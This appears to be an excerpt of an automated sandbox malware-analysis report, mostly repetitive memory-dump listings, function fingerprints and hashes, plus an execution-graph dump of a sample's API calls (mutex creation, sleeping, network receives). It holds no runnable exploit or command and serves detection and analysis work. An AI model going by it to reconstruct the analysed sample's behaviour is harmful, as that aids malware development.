                                                                                                      • Associated: 00000000.00000002.1886888194.000000000107B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886933792.0000000001088000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887009956.000000000108D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887062815.000000000108E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887100518.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887139267.0000000001092000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887178042.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887222344.00000000010AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887259907.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887296727.00000000010AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887336233.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887394735.00000000010D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887420470.00000000010D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887420470.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887514236.00000000010F9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887552899.00000000010FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887591736.000000000110F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887630778.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887668666.0000000001112000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887707800.0000000001118000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887744948.000000000111A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887786083.0000000001127000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887823253.0000000001129000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_e10000_SecuriteInfo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: _wcsrchr
                                                                                                      • String ID: .bat$.cmd$.com$.exe
                                                                                                      • API String ID: 1752292252-4019086052
                                                                                                      • Opcode ID: ff09a3c26120e3593510d0c6089c4769b383bc0e6481d93f849887581aa52d32
                                                                                                      • Instruction ID: 61c1f88b5c9e20bd66e7eb844e7c01129fcd92e4ebb8ece3ec02d5bba3af4730
                                                                                                      • Opcode Fuzzy Hash: ff09a3c26120e3593510d0c6089c4769b383bc0e6481d93f849887581aa52d32
                                                                                                      • Instruction Fuzzy Hash: FF014977A447212576192019BE0263F17C89FD6BF8B6A203FFC54FB2C2EE95DC024194
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00E2D202 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1885216427.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885241101.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885371883.0000000000E79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885410128.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885438373.0000000000E87000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886119092.0000000000FD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886156330.0000000000FD8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886197108.0000000000FED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886197108.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886289577.0000000001014000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886326423.0000000001016000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886355276.0000000001029000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886390792.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886430986.0000000001032000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886469194.000000000103D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886513828.0000000001052000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886550731.0000000001056000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886591341.000000000105E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886631945.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886671373.0000000001067000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886709527.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886752961.000000000107A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886888194.000000000107B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886933792.0000000001088000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887009956.000000000108D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887062815.000000000108E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887100518.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887139267.0000000001092000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887178042.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887222344.00000000010AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887259907.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887296727.00000000010AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887336233.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887394735.00000000010D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887420470.00000000010D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887420470.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887514236.00000000010F9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887552899.00000000010FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887591736.000000000110F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887630778.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887668666.0000000001112000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887707800.0000000001118000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887744948.000000000111A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887786083.0000000001127000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887823253.0000000001129000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_e10000_SecuriteInfo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                      • String ID:
                                                                                                      • API String ID: 531285432-0
                                                                                                      • Opcode ID: b0a3aebec89ec19e0738b2e3af70c1f18c6fa7c9d61a0ce80f37002296e8b89a
                                                                                                      • Instruction ID: ac6f713096bda855325820ce8b6e1f6d8f51ddf716a750ae9c022e1f5c76971d
                                                                                                      • Opcode Fuzzy Hash: b0a3aebec89ec19e0738b2e3af70c1f18c6fa7c9d61a0ce80f37002296e8b89a
                                                                                                      • Instruction Fuzzy Hash: C0212F71A002299FDF04EF94EC829BEB7B8FF48714F105059F601B7261DB709D458BA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00E5097F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1885216427.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885241101.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885371883.0000000000E79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885410128.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885438373.0000000000E87000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886119092.0000000000FD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886156330.0000000000FD8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886197108.0000000000FED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886197108.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886289577.0000000001014000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886326423.0000000001016000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886355276.0000000001029000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886390792.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886430986.0000000001032000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886469194.000000000103D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886513828.0000000001052000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886550731.0000000001056000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886591341.000000000105E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886631945.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886671373.0000000001067000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886709527.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886752961.000000000107A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886888194.000000000107B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886933792.0000000001088000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887009956.000000000108D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887062815.000000000108E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887100518.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887139267.0000000001092000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887178042.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887222344.00000000010AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887259907.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887296727.00000000010AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887336233.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887394735.00000000010D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887420470.00000000010D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887420470.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887514236.00000000010F9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887552899.00000000010FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887591736.000000000110F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887630778.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887668666.0000000001112000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887707800.0000000001118000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887744948.000000000111A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887786083.0000000001127000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887823253.0000000001129000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_e10000_SecuriteInfo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ___free_lconv_mon
                                                                                                      • String ID: 8B$`G
                                                                                                      • API String ID: 3903695350-3211121227
                                                                                                      • Opcode ID: ab6a5de541c358f13fed26671e5804ac2f411c85236c76f8e8a066e0d12c45af
                                                                                                      • Instruction ID: 2d4c6cefcf0ae9d5d61be8dc5c9921eb8f295830277237b370f37172b51267be
                                                                                                      • Opcode Fuzzy Hash: ab6a5de541c358f13fed26671e5804ac2f411c85236c76f8e8a066e0d12c45af
                                                                                                      • Instruction Fuzzy Hash: B03152316007059FEB60AE38D949BA673E8AF40355F24A829F899F7192DF71FD44C710
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:0.8%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:687
                                                                                                      Total number of Limit Nodes:4
                                                                                                      execution_graph 11340 863b47 11341 863b51 11340->11341 11343 8631d0 5 API calls 11341->11343 11344 863b5f 11341->11344 11342 863b68 11343->11344 11344->11342 11345 863710 3 API calls 11344->11345 11346 863bdb 11345->11346 11059 86da05 11060 86da15 11059->11060 11063 879e60 11060->11063 11062 86da4a std::invalid_argument::invalid_argument 11064 879eba __cftof 11063->11064 11070 87b240 11064->11070 11068 879f69 std::_Throw_future_error 11069 879efc std::invalid_argument::invalid_argument 11069->11062 11083 87b580 11070->11083 11072 87b275 11073 862be0 4 API calls 11072->11073 11074 87b2a6 11073->11074 11087 87b600 11074->11087 11076 879ee4 11076->11069 11077 8642f0 11076->11077 11078 87d56f InitOnceExecuteOnce 11077->11078 11079 86430a 11078->11079 11080 864311 11079->11080 11081 89834b 3 API calls 11079->11081 11080->11068 11082 864324 11081->11082 11084 87b59c 11083->11084 11092 87dd1b 11084->11092 11086 87b5a7 11086->11072 11089 87b67f shared_ptr 11087->11089 11091 87b6e8 11089->11091 11110 87b8a0 11089->11110 11090 87b6cb 11090->11076 11095 87da65 11092->11095 11094 87dd2b 11094->11086 11096 87da71 11095->11096 11097 87da7b 11095->11097 11098 87da2e 11096->11098 11099 87da4e 11096->11099 11097->11094 11098->11097 11104 87e365 11098->11104 11108 87e39a 11099->11108 11102 87da60 11102->11094 11105 87e373 InitializeCriticalSectionEx 11104->11105 11106 87da47 11104->11106 11105->11106 11106->11094 11109 87e3af RtlInitializeConditionVariable 11108->11109 11109->11102 11111 87b920 11110->11111 11117 878800 11111->11117 11113 87b95c shared_ptr 11114 87bb4e shared_ptr 11113->11114 11115 863de0 3 API calls 11113->11115 11114->11090 11116 87bb36 11115->11116 11116->11090 11118 878841 11117->11118 11125 863870 11118->11125 11120 878a76 std::invalid_argument::invalid_argument 11120->11113 11121 8788dd __cftof 11121->11120 11122 87dd1b __Mtx_init_in_situ 2 API calls 11121->11122 11123 878a31 11122->11123 11130 862dc0 11123->11130 11126 87dd1b __Mtx_init_in_situ 2 API calls 11125->11126 11127 8638a7 11126->11127 11128 87dd1b __Mtx_init_in_situ 2 API calls 11127->11128 11129 8638e6 11128->11129 11129->11121 11131 862e06 11130->11131 11136 862e6f 11130->11136 11132 87dd3c GetSystemTimePreciseAsFileTime 11131->11132 11133 862e12 11132->11133 11134 862f1e 11133->11134 11138 862e1d __Mtx_unlock 11133->11138 11135 87d8fa 4 API calls 11134->11135 11137 862f24 11135->11137 11140 87dd3c GetSystemTimePreciseAsFileTime 11136->11140 11149 862eef 11136->11149 11139 87d8fa 4 API calls 11137->11139 11138->11136 11138->11137 11141 862eb9 11139->11141 11140->11141 11142 87d8fa 4 API calls 11141->11142 11143 862ec0 __Mtx_unlock 11141->11143 11142->11143 11144 87d8fa 4 API calls 11143->11144 11145 862ed8 11143->11145 11144->11145 11146 87d8fa 4 API calls 11145->11146 11145->11149 11147 862f3c 11146->11147 11148 87dd3c GetSystemTimePreciseAsFileTime 11147->11148 11158 862f80 shared_ptr __Mtx_unlock 11148->11158 11149->11120 11150 87d8fa 4 API calls 11151 8630cb 11150->11151 11152 87d8fa 4 API calls 11151->11152 11153 8630d1 11152->11153 11154 87d8fa 4 API calls 11153->11154 11160 863093 __Mtx_unlock 11154->11160 11155 8630a7 std::invalid_argument::invalid_argument 11155->11120 11156 87d8fa 4 API calls 11157 8630dd 11156->11157 11158->11151 11158->11155 11159 87dd3c GetSystemTimePreciseAsFileTime 11158->11159 11161 86305f 11158->11161 11159->11161 11160->11155 11160->11156 11161->11150 11161->11153 11161->11160 11242 89d18d 11243 89d1b7 11242->11243 11245 89d19d __cftof __dosmaperr 11242->11245 11244 897f9a __cftof 3 API calls 11243->11244 11243->11245 11244->11245 11162 868600 11163 86864c 11162->11163 11164 865d40 3 API calls 11163->11164 11165 868667 shared_ptr 11164->11165 11166 8687d1 shared_ptr std::invalid_argument::invalid_argument 11165->11166 11167 865d40 3 API calls 11165->11167 11169 86886a shared_ptr 11167->11169 11168 86894e shared_ptr std::invalid_argument::invalid_argument 11169->11168 11170 865d40 3 API calls 11169->11170 11171 8689ea shared_ptr std::invalid_argument::invalid_argument 11170->11171 11323 862d00 11324 862d28 11323->11324 11325 87dd1b __Mtx_init_in_situ 2 API calls 11324->11325 11326 862d33 11325->11326 11246 863b8e 11247 863b98 11246->11247 11248 862310 4 API calls 11247->11248 11249 863ba5 11247->11249 11248->11249 11250 863bcf 11249->11250 11254 863710 11249->11254 11252 863710 3 API calls 11250->11252 11253 863bdb 11252->11253 11255 86371c 11254->11255 11256 862340 3 API calls 11255->11256 11257 86373e 11256->11257 11258 86958c 11259 8695ac shared_ptr 11258->11259 11260 86a423 Sleep CreateMutexA 11259->11260 11261 86961b shared_ptr 11259->11261 11262 86a45e 11260->11262 10529 86c48d 10530 86c498 shared_ptr 10529->10530 10531 86c61d shared_ptr std::invalid_argument::invalid_argument 10530->10531 10532 86c645 10530->10532 10538 865d40 10530->10538 10552 868b00 10530->10552 10535 865d40 3 API calls 10532->10535 10536 86c6ad 10535->10536 10556 86c290 10536->10556 10540 865d84 shared_ptr __cftof 10538->10540 10539 865e5c shared_ptr std::invalid_argument::invalid_argument 10539->10530 10540->10539 10541 865d40 3 API calls 10540->10541 10542 866231 10541->10542 10565 8621c0 10542->10565 10544 866249 shared_ptr 10545 865d40 3 API calls 10544->10545 10551 8663d2 shared_ptr std::invalid_argument::invalid_argument 10544->10551 10546 8662bd 10545->10546 10547 8621c0 3 API calls 10546->10547 10550 8662d7 shared_ptr 10547->10550 10548 865d40 3 API calls 10548->10550 10549 8621c0 3 API calls 10549->10550 10550->10548 10550->10549 10550->10551 10551->10530 10553 868b50 10552->10553 10554 865d40 3 API calls 10553->10554 10555 868b6a shared_ptr std::invalid_argument::invalid_argument 10554->10555 10555->10530 10563 86c2fd 10556->10563 10557 86c61d shared_ptr std::invalid_argument::invalid_argument 10558 865d40 3 API calls 10558->10563 10559 868b00 3 API calls 10559->10563 10560 86c645 10561 865d40 3 API calls 10560->10561 10562 86c6ad 10561->10562 10564 86c290 3 API calls 10562->10564 10563->10557 10563->10558 10563->10559 10563->10560 10568 862180 10565->10568 10569 862196 10568->10569 10572 899dc7 10569->10572 10575 898bb6 10572->10575 10574 8621a4 10574->10544 10576 898bde __cftof __dosmaperr std::invalid_argument::invalid_argument 10575->10576 10577 898bf6 10575->10577 10576->10574 10577->10576 10581 897f9a 10577->10581 10579 898c0e 10589 899171 10579->10589 10582 897fba 10581->10582 10583 897fb1 10581->10583 10582->10583 10596 89bc91 10582->10596 10583->10579 10591 899182 10589->10591 10590 899191 __cftof __dosmaperr 10590->10576 10591->10590 10668 899715 10591->10668 10673 89936f 10591->10673 10678 899395 10591->10678 10688 8994e3 10591->10688 10599 89bc9b __dosmaperr ___free_lconv_mon 10596->10599 10597 897fda 10601 89cc1b 10597->10601 10599->10597 10609 89a20f 10599->10609 10602 897ff0 10601->10602 10603 89cc2e 10601->10603 10605 89cc48 10602->10605 10603->10602 10635 8a0bcb 10603->10635 10606 89cc5b 10605->10606 10607 89cc70 10605->10607 10606->10607 10642 89fcd1 10606->10642 10607->10583 10610 89a214 __cftof 10609->10610 10614 89a21f __cftof 10610->10614 10615 89ec54 10610->10615 10629 897c7d 10614->10629 10617 89ec60 __cftof __dosmaperr 10615->10617 10616 89ecbc __cftof __dosmaperr 10616->10614 10617->10616 10618 89ee3b __dosmaperr 10617->10618 10619 89ed46 10617->10619 10621 89ed71 __cftof 10617->10621 10620 897c7d __cftof 3 API calls 10618->10620 10619->10621 10632 89ec4b 10619->10632 10622 89ee4e 10620->10622 10621->10616 10623 89edc5 10621->10623 10626 89bc91 __cftof 3 API calls 10621->10626 10623->10616 10628 89bc91 __cftof 3 API calls 10623->10628 10626->10623 10627 89ec4b __cftof 3 API calls 10627->10621 10628->10616 10630 897b57 __cftof 3 API calls 10629->10630 10631 897c8e 10630->10631 10633 89bc91 __cftof GetPEB ExitProcess GetPEB 10632->10633 10634 89ec50 10633->10634 10634->10627 10636 8a0bd7 __dosmaperr 10635->10636 10637 89bc91 __cftof 3 API calls 10636->10637 10638 8a0be0 __cftof __dosmaperr 10637->10638 10639 8a0c26 10638->10639 10640 89a20f __cftof 3 API calls 10638->10640 10639->10602 10641 8a0c4b 10640->10641 10643 89bc91 __cftof 3 API calls 10642->10643 10644 89fcdb 10643->10644 10647 89fbe9 10644->10647 10646 89fce1 10646->10607 10651 89fbf5 __cftof __dosmaperr ___free_lconv_mon 10647->10651 10648 89fc16 10648->10646 10649 89a20f __cftof 3 API calls 10650 89fc88 10649->10650 10652 89fcc4 10650->10652 10656 89bd4e 10650->10656 10651->10648 10651->10649 10652->10646 10660 89bd59 __dosmaperr ___free_lconv_mon 10656->10660 10657 89a20f __cftof GetPEB ExitProcess GetPEB 10658 89bde7 10657->10658 10659 89bdde 10661 89fad0 10659->10661 10660->10657 10660->10659 10662 89fbe9 __cftof GetPEB ExitProcess GetPEB 10661->10662 10663 89fae3 10662->10663 10664 89f879 __cftof GetPEB ExitProcess GetPEB 10663->10664 10665 89faeb __cftof 10664->10665 10666 89fce4 __cftof GetPEB ExitProcess GetPEB 10665->10666 10667 89fafc __cftof __dosmaperr ___free_lconv_mon 10665->10667 10666->10667 10667->10652 10669 89971e 10668->10669 10670 899725 10668->10670 10697 8990fd 10669->10697 10670->10591 10672 899724 10672->10591 10674 899378 10673->10674 10675 89937f 10673->10675 10676 8990fd 3 API calls 10674->10676 10675->10591 10677 89937e 10676->10677 10677->10591 10679 8993b6 __cftof __dosmaperr 10678->10679 10680 89939c 10678->10680 10679->10591 10680->10679 10681 899516 10680->10681 10683 89954f 10680->10683 10687 899524 10680->10687 10684 899538 10681->10684 10681->10687 10715 8997ee 10681->10715 10683->10684 10711 89993d 10683->10711 10684->10591 10687->10684 10719 899c97 10687->10719 10689 8994fc 10688->10689 10690 899516 10688->10690 10689->10690 10692 89954f 10689->10692 10696 899524 10689->10696 10691 8997ee 3 API calls 10690->10691 10693 899538 10690->10693 10690->10696 10691->10696 10692->10693 10694 89993d 3 API calls 10692->10694 10693->10591 10694->10696 10695 899c97 3 API calls 10695->10693 10696->10693 10696->10695 10698 89910f __dosmaperr 10697->10698 10701 89a0d9 10698->10701 10700 899132 __dosmaperr 10700->10672 10702 89a0f4 10701->10702 10705 899e37 10702->10705 10704 89a0fe 10704->10700 10706 899e49 10705->10706 10707 897f9a __cftof GetPEB ExitProcess GetPEB 10706->10707 10710 899e5e __cftof __dosmaperr 10706->10710 10709 899e8e 10707->10709 10708 89a085 GetPEB ExitProcess GetPEB 10708->10709 10709->10708 10709->10710 10710->10704 10712 899958 10711->10712 10713 89998a 10712->10713 10723 89ddbf 10712->10723 10713->10687 10716 899807 10715->10716 10730 89e8f9 10716->10730 10718 8998ba 10718->10687 10720 899d0a std::invalid_argument::invalid_argument 10719->10720 10722 899cb4 10719->10722 10720->10684 10721 89ddbf __cftof 3 API calls 10721->10722 10722->10720 10722->10721 10726 89dc64 10723->10726 10725 89ddd7 10725->10713 10727 89dc74 10726->10727 10728 897f9a __cftof GetPEB ExitProcess GetPEB 10727->10728 10729 89dc79 __cftof __dosmaperr 10727->10729 10728->10729 10729->10725 10731 89e909 __cftof __dosmaperr 10730->10731 10732 89e91f 10730->10732 10731->10718 10732->10731 10733 89e9b6 10732->10733 10734 89e9bb 10732->10734 10736 89e9df 10733->10736 10737 89ea15 10733->10737 10743 89e110 10734->10743 10739 89e9fd 10736->10739 10740 89e9e4 10736->10740 10760 89e429 10737->10760 10756 89e613 10739->10756 10749 89e76f 10740->10749 10744 89e122 10743->10744 10745 897f9a __cftof GetPEB ExitProcess GetPEB 10744->10745 10746 89e136 10745->10746 10747 89e429 GetPEB ExitProcess GetPEB 10746->10747 10748 89e13e __alldvrm __cftof __dosmaperr _strrchr 10746->10748 10747->10748 10748->10731 10751 89e79d 10749->10751 10750 89e80f 10752 89e4cb GetPEB ExitProcess GetPEB 10750->10752 10751->10750 10753 89e7e8 10751->10753 10755 89e7d6 10751->10755 10752->10755 10753->10753 10754 89e69e GetPEB ExitProcess GetPEB 10753->10754 10754->10755 10755->10731 10757 89e640 10756->10757 10758 89e67f 10757->10758 10759 89e69e GetPEB ExitProcess GetPEB 10757->10759 10758->10731 10759->10758 10761 89e441 10760->10761 10762 89e4a6 10761->10762 10763 89e4cb GetPEB ExitProcess GetPEB 10761->10763 10762->10731 10763->10762 10764 862a90 10765 862ace 10764->10765 10768 87ce8b 10765->10768 10767 862adb shared_ptr std::invalid_argument::invalid_argument 10769 87ce97 10768->10769 10770 87cea7 10768->10770 10769->10770 10772 87e108 10769->10772 10770->10767 10773 87e11d TpReleaseWork 10772->10773 10773->10770 10851 86d8d0 10852 86d911 recv 10851->10852 10853 86d932 recv 10852->10853 10855 86d967 recv 10853->10855 10857 86d9a1 10855->10857 11177 862a10 11178 862a1c 11177->11178 11179 862a1a 11177->11179 11180 87d8fa 4 API calls 11178->11180 11181 862a22 11180->11181 11199 868450 11201 8685ba 11199->11201 11202 8684a8 shared_ptr 11199->11202 11200 865d40 